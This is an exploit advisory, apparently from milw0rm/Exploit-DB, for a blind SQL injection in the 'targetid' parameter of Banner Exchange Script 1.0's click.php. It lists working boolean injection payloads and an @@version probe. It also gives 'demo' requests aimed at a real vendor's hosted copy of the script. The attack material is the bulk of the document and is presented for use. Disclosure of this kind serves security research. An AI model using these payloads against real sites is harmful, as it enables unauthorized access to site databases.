Banner Exchange Script 1.0 (targetid) Blind SQL Injection Vuln



EDB-ID: 9387 CVE: 2009-5003 OSVDB-ID: 68191
Author: 599eme Man Published: 2009-08-07 Verified: Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next
_00000__00000__00000__00000__0___0__00000____0___0___000___0___0_
_0______0___0__0___0__0______00_00__0________00_00__0___0__00_00_
_0000___00000__00000__00000__0_0_0__00000____0_0_0__0___0__0_0_0_
_____0______0______0__0______0___0__0________0___0__00000__0___0_
_0000___00000__00000__00000__0___0__00000____0___0__0___0__0___0_
_________________________________________________________________


# [+] Banner Exchange Script 1.0 (targetid) Remote Blind injection SQL
# [+] Software : Banner Exchange Script
# [+] Author : 599eme Man
# [+] Contact : Flouf@live.fr
# [+] Thanks : Moudi, Neocoderz, Sheiry, Shimik Root aka Str0zen, Pr0H4ck3rz, Staker, Security-shell...
# [+] Special : Moudi my Brozazaaaaaaaaaaaa
# [+] Download : http://www.e-soft24.com/banner-exchange-script-p-367.html
#
#[------------------------------------------------------------------------------------]
# 
# [+] Vulnerabilities
#
#	[+] Blind
#
#		- http://www.site.com/click.php?hostid=[nr1]&targetid=[nr2] and 1=1 <= True so the page is redirected
# 		- http://www.site.com/click.php?hostid=[nr1]&targetid=[nr2] and 1=2 <= False so the page isn't redirected
#
#		- http://www.site.com/click.php?hostid=[nr1]&targetid=[nr2] and substring(@@version,1,1)=4 <= False so the page isn't redirected
#		- http://www.site.com/click.php?hostid=[nr1]&targetid=[nr2] and substring(@@version,1,1)=5 <= True so the page is redirected
#
#			[+] Demo
#
#				- http://www.e-soft24.com/scripts/banner-exchange/click.php?hostid=2&targetid=56%20and%20substring%28@@version,1,1%29=4 <= False so the page isn't redirected
#				- http://www.e-soft24.com/scripts/banner-exchange/click.php?hostid=2&targetid=56%20and%20substring%28@@version,1,1%29=5 <= True so the page is redirected
#
#[------------------------------------------------------------------------------------]
#
#########################################################################################################

# milw0rm.com [2009-08-07]